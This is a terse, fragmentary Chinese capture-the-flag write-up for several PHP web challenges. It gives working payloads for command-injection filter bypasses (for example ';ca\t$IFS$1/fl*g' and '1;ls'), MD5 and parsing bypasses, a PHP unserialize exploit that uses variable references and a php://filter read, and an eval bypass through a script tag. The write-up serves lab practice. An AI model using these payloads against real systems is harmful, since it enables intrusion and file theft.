打开题目,发现右键被禁了
直接ctrl+u查看源码得到flag
源码
php中变量与变量之间用点号连接表示拼接
题目拼接结果为passthru
那么我们直接ls /
得到flag
简单的命令执行绕过
payload
?hongzh0=;ca\t$IFS$1/fl*g
源码
分析一下,就是简单的MD5绕过和php解析特性
得到hint
访问./L0vey0U.php
exp
a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
}
public function __destruct()
{
echo $this->b;
}
}
@unserialize($_POST['data']);
?>
非常简单的变量引用
exp如下
b=&$C->a;
echo serialize($C);
简单的命令注入,用分号隔断命令
1;ls
1;ca\t f*
源码
". $word);
}else{
highlight_file(__FILE__);
}
简单分析下,eval函数中已经闭合前面?>
,那么我们要自己输入php的头,由于问号被过滤了
这里用secript(文件上传做的多会很快想到),然后就是一些常规过滤,用%09代替空格,反斜杠绕过关键字检测
?word=